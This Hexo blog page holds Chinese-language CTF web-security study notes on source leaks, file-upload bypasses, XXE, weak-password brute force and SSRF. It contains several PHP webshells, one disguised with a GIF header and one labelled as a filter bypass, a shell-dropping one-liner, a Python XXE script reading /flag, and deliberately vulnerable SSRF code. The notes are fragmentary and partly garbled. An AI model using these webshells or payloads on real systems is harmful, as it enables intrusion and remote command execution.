<!DOCTYPE html><html lang="en" data-theme="light"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1.0,viewport-fit=cover"><title>web | Hexo</title><meta name="author" content="John Doe"><meta name="copyright" content="John Doe"><meta name="format-detection" content="telephone=no"><meta name="theme-color" content="#ffffff"><meta name="description" content="一信息泄露1.目录遍历&#x2F;1跳过其他目录找到flag#&#x2F;..&#x2F;2.phpinfoPhp探针通过网页查找flag搜索3.备份文件下载（1：网站源码常见网站源码备份tar&#x2F;tar.gz&#x2F;zip&#x2F;rar文件名web&#x2F;website&#x2F;backup&#x2F;back&#x2F;www&#x2F;wwwroot&#x2F;temp">
<meta property="og:type" content="article">
<meta property="og:title" content="web">
<meta property="og:url" content="http://example.com/2025/03/15/1/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="一信息泄露1.目录遍历&#x2F;1跳过其他目录找到flag#&#x2F;..&#x2F;2.phpinfoPhp探针通过网页查找flag搜索3.备份文件下载（1：网站源码常见网站源码备份tar&#x2F;tar.gz&#x2F;zip&#x2F;rar文件名web&#x2F;website&#x2F;backup&#x2F;back&#x2F;www&#x2F;wwwroot&#x2F;temp">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="http://example.com/img/butterfly-icon.png">
<meta property="article:published_time" content="2025-03-15T12:16:55.000Z">
<meta property="article:modified_time" content="2025-03-15T12:28:09.007Z">
<meta property="article:author" content="John Doe">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://example.com/img/butterfly-icon.png"><script type="application/ld+json">{
  "@context": "https://schema.org",
  "@type": "BlogPosting",
  "headline": "web",
  "url": "http://example.com/2025/03/15/1/",
  "image": "http://example.com/img/butterfly-icon.png",
  "datePublished": "2025-03-15T12:16:55.000Z",
  "dateModified": "2025-03-15T12:28:09.007Z",
  "author": [
    {
      "@type": "Person",
      "name": "John Doe",
      "url": "http://example.com"
    }
  ]
}</script><link rel="shortcut icon" href="/img/favicon.png"><link rel="canonical" href="http://example.com/2025/03/15/1/index.html"><link rel="preconnect" href="//cdn.jsdelivr.net"/><link rel="preconnect" href="//busuanzi.ibruce.info"/><link rel="stylesheet" href="/css/index.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free/css/all.min.css"><script>
    (() => {
      
    const saveToLocal = {
      set: (key, value, ttl) => {
        if (!ttl) return
        const expiry = Date.now() + ttl * 86400000
        localStorage.setItem(key, JSON.stringify({ value, expiry }))
      },
      get: key => {
        const itemStr = localStorage.getItem(key)
        if (!itemStr) return undefined
        const { value, expiry } = JSON.parse(itemStr)
        if (Date.now() > expiry) {
          localStorage.removeItem(key)
          return undefined
        }
        return value
      }
    }

    window.btf = {
      saveToLocal,
      getScript: (url, attr = {}) => new Promise((resolve, reject) => {
        const script = document.createElement('script')
        script.src = url
        script.async = true
        Object.entries(attr).forEach(([key, val]) => script.setAttribute(key, val))
        script.onload = script.onreadystatechange = () => {
          if (!script.readyState || /loaded|complete/.test(script.readyState)) resolve()
        }
        script.onerror = reject
        document.head.appendChild(script)
      }),
      getCSS: (url, id) => new Promise((resolve, reject) => {
        const link = document.createElement('link')
        link.rel = 'stylesheet'
        link.href = url
        if (id) link.id = id
        link.onload = link.onreadystatechange = () => {
          if (!link.readyState || /loaded|complete/.test(link.readyState)) resolve()
        }
        link.onerror = reject
        document.head.appendChild(link)
      }),
      addGlobalFn: (key, fn, name = false, parent = window) => {
        if (!false && key.startsWith('pjax')) return
        const globalFn = parent.globalFn || {}
        globalFn[key] = globalFn[key] || {}
        globalFn[key][name || Object.keys(globalFn[key]).length] = fn
        parent.globalFn = globalFn
      }
    }
  
      
      const activateDarkMode = () => {
        document.documentElement.setAttribute('data-theme', 'dark')
        if (document.querySelector('meta[name="theme-color"]') !== null) {
          document.querySelector('meta[name="theme-color"]').setAttribute('content', '#0d0d0d')
        }
      }
      const activateLightMode = () => {
        document.documentElement.setAttribute('data-theme', 'light')
        if (document.querySelector('meta[name="theme-color"]') !== null) {
          document.querySelector('meta[name="theme-color"]').setAttribute('content', '#ffffff')
        }
      }

      btf.activateDarkMode = activateDarkMode
      btf.activateLightMode = activateLightMode

      const theme = saveToLocal.get('theme')
    
          theme === 'dark' ? activateDarkMode() : theme === 'light' ? activateLightMode() : null
        
      
      const asideStatus = saveToLocal.get('aside-status')
      if (asideStatus !== undefined) {
        document.documentElement.classList.toggle('hide-aside', asideStatus === 'hide')
      }
    
      
    const detectApple = () => {
      if (/iPad|iPhone|iPod|Macintosh/.test(navigator.userAgent)) {
        document.documentElement.classList.add('apple')
      }
    }
    detectApple()
  
    })()
  </script><script>const GLOBAL_CONFIG = {
  root: '/',
  algolia: undefined,
  localSearch: undefined,
  translate: undefined,
  highlight: {"plugin":"highlight.js","highlightCopy":true,"highlightLang":true,"highlightHeightLimit":false,"highlightFullpage":false,"highlightMacStyle":false},
  copy: {
    success: 'Copy Successful',
    error: 'Copy Failed',
    noSupport: 'Browser Not Supported'
  },
  relativeDate: {
    homepage: false,
    post: false
  },
  runtime: '',
  dateSuffix: {
    just: 'Just now',
    min: 'minutes ago',
    hour: 'hours ago',
    day: 'days ago',
    month: 'months ago'
  },
  copyright: undefined,
  lightbox: 'null',
  Snackbar: undefined,
  infinitegrid: {
    js: 'https://cdn.jsdelivr.net/npm/@egjs/infinitegrid/dist/infinitegrid.min.js',
    buttonText: 'Load More'
  },
  isPhotoFigcaption: false,
  islazyloadPlugin: false,
  isAnchor: false,
  percent: {
    toc: true,
    rightside: false,
  },
  autoDarkmode: false
}</script><script id="config-diff">var GLOBAL_CONFIG_SITE = {
  title: 'web',
  isHighlightShrink: false,
  isToc: true,
  pageType: 'post'
}</script><meta name="generator" content="Hexo 7.3.0"></head><body><div class="post" id="body-wrap"><header class="post-bg" id="page-header"><nav id="nav"><span id="blog-info"><a class="nav-site-title" href="/"><span class="site-name">Hexo</span></a><a class="nav-page-title" href="/"><span class="site-name">web</span><span class="site-name"><i class="fa-solid fa-circle-arrow-left"></i><span>  Back to Home</span></span></a></span><div id="menus"></div></nav><div id="post-info"><h1 class="post-title">web</h1><div id="post-meta"><div class="meta-firstline"><span class="post-meta-date"><i class="far fa-calendar-alt fa-fw post-meta-icon"></i><span class="post-meta-label">Created</span><time class="post-meta-date-created" datetime="2025-03-15T12:16:55.000Z" title="Created 2025-03-15 20:16:55">2025-03-15</time><span class="post-meta-separator">|</span><i class="fas fa-history fa-fw post-meta-icon"></i><span class="post-meta-label">Updated</span><time class="post-meta-date-updated" datetime="2025-03-15T12:28:09.007Z" title="Updated 2025-03-15 20:28:09">2025-03-15</time></span></div><div class="meta-secondline"><span class="post-meta-separator">|</span><span class="post-meta-pv-cv" id="" data-flag-title=""><i class="far fa-eye fa-fw post-meta-icon"></i><span class="post-meta-label">Post Views:</span><span id="busuanzi_value_page_pv"><i class="fa-solid fa-spinner fa-spin"></i></span></span></div></div></div></header><main class="layout" id="content-inner"><div id="post"><article class="container post-content" id="article-container"><p>一信息泄露<br>1.目录遍历&#x2F;1<br>跳过其他目录找到flag#&#x2F;..&#x2F;<br>2.phpinfo<br>Php探针<br>通过网页查找flag搜索<br>3.备份文件下载<br>（1：网站源码<br>常见网站源码备份<br>tar&#x2F;tar.gz&#x2F;zip&#x2F;rar<br>文件名<br>web&#x2F;website&#x2F;backup&#x2F;back&#x2F;www&#x2F;wwwroot&#x2F;temp<br>使用dirsearch工具无法使用    # python3  dirsearch.py  -u网址 -e*<br>（2：bak文件<br>备份在web文件<br>访问url&#x2F;index.php.bak下载源码获得flag<br>（3：vim缓存<br>使用了vim编辑器，就会留有缓存。会一直留存在服务器上<br>第一次 .index.php.swp<br>第二次 .index.php.swo<br>第三次 .index.php.swn<br>也可能生成.index.php.~<br>Index前有.<br>注入后会下载文件<br>记事本打开使用ctrl+f<br>查找flag<br>（4：DS.store<br>苹果系统Linux文件<br>url&#x2F;.DS_Store下载文件<br>工具python-dsstore<br>无法使用工具<br>4.git泄漏<br>开发者会在GitHub等云环境中，会导致git泄露<br>Git工具使用<br>Githacker工具使用 # python3  GitHacker.py 网址 &#x2F;.git<br>&#x2F;# ls 得知有什么文件 消除上一个网址的影响 # cd .. #ls  # rm -rf<br>首先要用dirsearch扫描文件（注意是git文件），再注入得到文件<br>得到flag<br>在kail中操作先下载环境<br>三种log stash index<br>Log  #git log获得版本号，版本前九位数# git reset –hard (九位数）<br>Stash #git stash pop（从git栈中获得最后一次的保存内容）Git stash list获得全部<br>Index  在githacker中 # ks #ls #more 文件<br>5.SVN泄露<br>保存在pristine文件夹<br>SVN工具  # .&#x2F;rip-svn.pl -v -u 网址 &#x2F;.svn&#x2F;<br>查找隐藏文件# ls -ah<br>找到.svn文件然后# ls #cd pristine&#x2F;文件<br>6.HG泄露（windows<br>HG工具dvcs-ripper</p>
<h1 id="rip-hg-pl-v-u-网址-hg"><a href="#rip-hg-pl-v-u-网址-hg" class="headerlink" title=".&#x2F;rip-hg.pl -v -u 网址 &#x2F;.hg&#x2F;"></a>.&#x2F;rip-hg.pl -v -u 网址 &#x2F;.hg&#x2F;</h1><p>#grep -r flag*进入flag文件就行了<br>二.文件上传<br>一句话木马</p>
<p>&#x2F;&#x2F; 构造合法 GIF 头部 + PHP 代码<br>$payload &#x3D; hex2bin(‘474946383961’) .  &#x2F;&#x2F; GIF89a<br>    “<?php system(\$_GET['cmd']); ?>“;<br>file_put_contents(‘shell.gif’, $payload);</p>
<p>getimagesize(上 函数返回一个包含图像信息的数组。该数组的索引如下所示：<br>索引·0：图像的宽度（单位：像素）<br>索引·1：图像的高度（单位：像素）《<br>索引：2：图像类型的常量值（可以使用 image type to mime_type(·函数将其转换为MIME<br>类型）<br>索引·3：包含图像属性的字符串，以逗号分隔(如·”width&#x3D;500, height&#x3D;300”)&lt;<br>如果·getimagesize()·函数无法读取图像信息，则返回·false。否则，返回一个包含上述索引<br>的数组。<br>IMAGETYPE GIF：代表·GIF·图像文件的常量值<br>IMAGETYPE JPEG：代表·JPEG·图像文件的常量值<br>IMAGETYPE PNG：代表·PNG·图像文件的常量值<br>GIF89a</p>
<script language="php">eval($_POST['a']);</script> 
<p>GIF89a<br><?php/* WAF-BYPASS*/
system($_POST['cmd']);
?><br><?php
@eval($_POST['a']);
?><br>生小马<br><?php fputs(fopen(‘shell.php’,’w’),’<?php @eval($_POST[“a”])?>’);?&gt;</p>
<p>图片标识<br>JPEG&#x2F;JFIF （常见的照片格式)：头两个字节为·0xFF·0xD8。<br>PNG（无损压缩格式）：头两个字节为·0x89·0x50。<br>GIF（支持动画的图像格式)：头两个字节为·0x47-0x49。<br>BMP(Windows 位图格式)：头两个字节为·0x42:0x4D。<br>TIFF（标签图像文件格式)：头两个字节可以是不同的数值。</p>
<p>1.js绕过<br>判断JavaScript<br>上传是否有直接显示禁止上传<br>(1:禁用js脚本<br>以 firefox 为例<br>接着再地址栏输入 about:config，点击回车键<br>在搜索地址栏中输入 javascript.enabled<br>(2:修改js脚本<br>修改可以上传php文件后获得表格查询flag<br>(3:使用bp抓包<br>修改文件后缀名<br>制作一个 phpinfo 内容的文件，后级修改为var allow_ext &#x3D;”jpgl.pngl.git”;<br>其中之一，使用burp 抓包，修改文件后缀为php</p>
<p>2.content-Type绕过<br>Content-Type，内容类型，一般是指网页中存在的ContentlType，用于定义网络文件的类型和网页的编码，决定文件接收方将以什么形式、什么编码读取这个文件，这就是经常看到一些 Asp网页点击的结果却是下载到的一个文件或一张图片的原因。<br>用 burpsuite 抓包，找到 content-type 字段，修改上传文件类型为image&#x2F;jpeg，则可以绕过检测，上传脚本文件。<br>一句话木马（记得关杀毒监管）<br><?php system($_GET['cmd']); ?></p>
<p>3.文件后缀绕过<br>可以尝试 phtml，php3，php4, php5, pht 后缀名都可以绕过，但是前提是要在配置文件<br>里面有这样的一句话<br>AddType application&#x2F;x-httpd-php .php .phtml .phps .php5 .pht<br>httpd.conf 中有如下配置代码<br>AddType application&#x2F;x-httpd-php. php .phtm! .phps .php5 .pht .htaccess</p>
<p>4.htaccess<br>有文件后缀过滤<br>但是htaccess没有过滤</p>
<p>XXE漏洞<br>Xml<br>Bp抓包变成json<br>通过DTD注入<br>利用python实现对网页的注入<br>import requests</p>
<p>url &#x3D; “<a target="_blank" rel="noopener" href="http://node2.anna.nssctf.cn:28937/ghctf">http://node2.anna.nssctf.cn:28937/ghctf</a>“<br>payload &#x3D; “””<?xml version="1.0"?><br><!DOCTYPE root [
    <!ENTITY xxe SYSTEM "file:///flag">找到flag文件包<br>]&gt;<br><root><br>    <name>&xxe;</name><br></root>“””</p>
<p>response &#x3D; requests.post(url, data&#x3D;{“xml”: payload})<br>print(response.text)输出flag</p>
<p>Ezlogin<br>弱口令爆破<br>用户密码登录<br>1.登录用户名为admin<br>2.查看网页源代码，发现该题是弱口令爆破<br>3.使用BurpSuite爆破，得到用户密码为administrator。<br>pickle反序列化</p>
<p>POP链反序列化的题目读代码从后往前</p>
<p>Gopher 与SSRF漏洞</p>
<p>Ssrffile_get_contents()</p>
<p>&#x2F;&#x2F;file_get_contents是把文件写入字符串，当把url是内网文件的时候，会先去把这个文件的内容读出来再写入，导致了文件读取</p>
<?php
if(isset($_POST['url']))
{
    $content=file_get_contents($_POST['url']);
    $filename='./images/'.rand().'.img';\
    file_put_contents($filename,$content);
    echo $_POST['url'];
    $img="<img src=\"".$filename."\"/>";

}
echo $img;
?>
<p>fsockopen()</p>
<p>&#x2F;&#x2F;fsockopen()函数本身就是打开一个网络连接或者Unix套接字连接</p>
<?php
$host=$_GET['url'];
$fp = fsockopen("$host", 80, $errno, $errstr, 30);
if (!$fp) {
    echo "$errstr ($errno)<br />\n";
} else {
    $out = "GET / HTTP/1.1\r\n";
    $out .= "Host: $host\r\n";
    $out .= "Connection: Close\r\n\r\n";
    fwrite($fp, $out);
    while (!feof($fp)) {
        echo fgets($fp, 128);
    }
    fclose($fp);
}
?>
<p>curl()</p>
<p>&#x2F;&#x2F;利用方式很多最常见的是通过file、dict、gopher这三个协议来进行渗透，接下来也主要是集中讲对于curl()函数的利用方式</p>
<p>function curl($url){<br>    $ch &#x3D; curl_init(); &#x2F;&#x2F;  初始化curl连接句柄<br>    curl_setopt($ch, CURLOPT_URL, $url); &#x2F;&#x2F;设置连接URL<br>    curl_setopt($ch, CURLOPT_HEADER, 0);  &#x2F;&#x2F; 不输出头文件的信息<br>    curl_exec($ch);   &#x2F;&#x2F; 执行获取结果<br>    curl_close($ch);  &#x2F;&#x2F; 关闭curl连接句柄<br>}</p>
<p>$url &#x3D; $_GET[‘url’];<br>curl($url); </p>
<p>file:&#x2F;&#x2F;&#x2F;  – 本地文件传输协议，主要用于访问本地计算机中的文件<br>dict:&#x2F;&#x2F;   – 字典服务器协议，dict是基于查询相应的TCP协议，服务器监听端口2628<br>sftp:&#x2F;&#x2F;   – SSH文件传输协议（SSH File Transfer Protocol），或安全文件传输协议（Secure File Transfer Protocol）<br>ldap:&#x2F;&#x2F;   – 轻量级目录访问协议。它是IP网络上的一种用于管理和访问分布式目录信息服务的应用程序协议<br>tftp:&#x2F;&#x2F;   – 基于lockstep机制的文件传输协议，允许客户端从远程主机获取文件或将文件上传至远程主机<br>gopher:&#x2F;&#x2F; – 互联网上使用的分布型的文件搜集获取网络协议，出现在http协议之前</p>
</article><div class="post-copyright"><div class="post-copyright__author"><span class="post-copyright-meta"><i class="fas fa-circle-user fa-fw"></i>Author: </span><span class="post-copyright-info"><a href="http://example.com">John Doe</a></span></div><div class="post-copyright__type"><span class="post-copyright-meta"><i class="fas fa-square-arrow-up-right fa-fw"></i>Link: </span><span class="post-copyright-info"><a href="http://example.com/2025/03/15/1/">http://example.com/2025/03/15/1/</a></span></div><div class="post-copyright__notice"><span class="post-copyright-meta"><i class="fas fa-circle-exclamation fa-fw"></i>Copyright Notice: </span><span class="post-copyright-info">All articles on this blog are licensed under <a target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0/">CC BY-NC-SA 4.0</a> unless otherwise stated.</span></div></div><div class="tag_share"><div class="post-share"><div class="social-share" data-image="/img/butterfly-icon.png" data-sites="facebook,twitter,wechat,weibo,qq"></div><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/butterfly-extsrc/sharejs/dist/css/share.min.css" media="print" onload="this.media='all'"><script src="https://cdn.jsdelivr.net/npm/butterfly-extsrc/sharejs/dist/js/social-share.min.js" defer></script></div></div><nav class="pagination-post" id="pagination"></nav></div><div class="aside-content" id="aside-content"><div class="card-widget card-info text-center"><div class="avatar-img"><img src="/img/butterfly-icon.png" onerror="this.onerror=null;this.src='/img/friend_404.gif'" alt="avatar"/></div><div class="author-info-name">John Doe</div><div class="author-info-description"></div><div class="site-data"><a href="/archives/"><div class="headline">Articles</div><div class="length-num">1</div></a><a href="/tags/"><div class="headline">Tags</div><div class="length-num">0</div></a><a href="/categories/"><div class="headline">Categories</div><div class="length-num">0</div></a></div><a id="card-info-btn" target="_blank" rel="noopener" href="https://github.com/xxxxxx"><i class="fab fa-github"></i><span>Follow Me</span></a></div><div class="card-widget card-announcement"><div class="item-headline"><i class="fas fa-bullhorn fa-shake"></i><span>Announcement</span></div><div class="announcement_content">This is my Blog</div></div><div class="sticky_layout"><div class="card-widget" id="card-toc"><div class="item-headline"><i class="fas fa-stream"></i><span>Contents</span><span class="toc-percentage"></span></div><div class="toc-content"><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#rip-hg-pl-v-u-%E7%BD%91%E5%9D%80-hg"><span class="toc-number">1.</span> <span class="toc-text">.&#x2F;rip-hg.pl -v -u 网址 &#x2F;.hg&#x2F;</span></a></li></ol></div></div><div class="card-widget card-recent-post"><div class="item-headline"><i class="fas fa-history"></i><span>Recent Posts</span></div><div class="aside-list"><div class="aside-list-item no-cover"><div class="content"><a class="title" href="/2025/03/15/1/" title="web">web</a><time datetime="2025-03-15T12:16:55.000Z" title="Created 2025-03-15 20:16:55">2025-03-15</time></div></div></div></div></div></div></main><footer id="footer"><div class="footer-other"><div class="footer-copyright"><span class="copyright">&copy;2025 By John Doe</span><span class="framework-info"><span>Framework </span><a target="_blank" rel="noopener" href="https://hexo.io">Hexo 7.3.0</a><span class="footer-separator">|</span><span>Theme </span><a target="_blank" rel="noopener" href="https://github.com/jerryc127/hexo-theme-butterfly">Butterfly 5.4.2</a></span></div></div></footer></div><div id="rightside"><div id="rightside-config-hide"><button id="readmode" type="button" title="Reading Mode"><i class="fas fa-book-open"></i></button><button id="darkmode" type="button" title="Toggle Between Light and Dark Mode"><i class="fas fa-adjust"></i></button><button id="hide-aside-btn" type="button" title="Toggle Between Single-column and Double-column"><i class="fas fa-arrows-alt-h"></i></button></div><div id="rightside-config-show"><button id="rightside-config" type="button" title="Settings"><i class="fas fa-cog fa-spin"></i></button><button class="close" id="mobile-toc-button" type="button" title="Table of Contents"><i class="fas fa-list-ul"></i></button><button id="go-up" type="button" title="Back to Top"><span class="scroll-percent"></span><i class="fas fa-arrow-up"></i></button></div></div><div><script src="/js/utils.js"></script><script src="/js/main.js"></script><div class="js-pjax"></div><script async data-pjax src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script></div></body></html>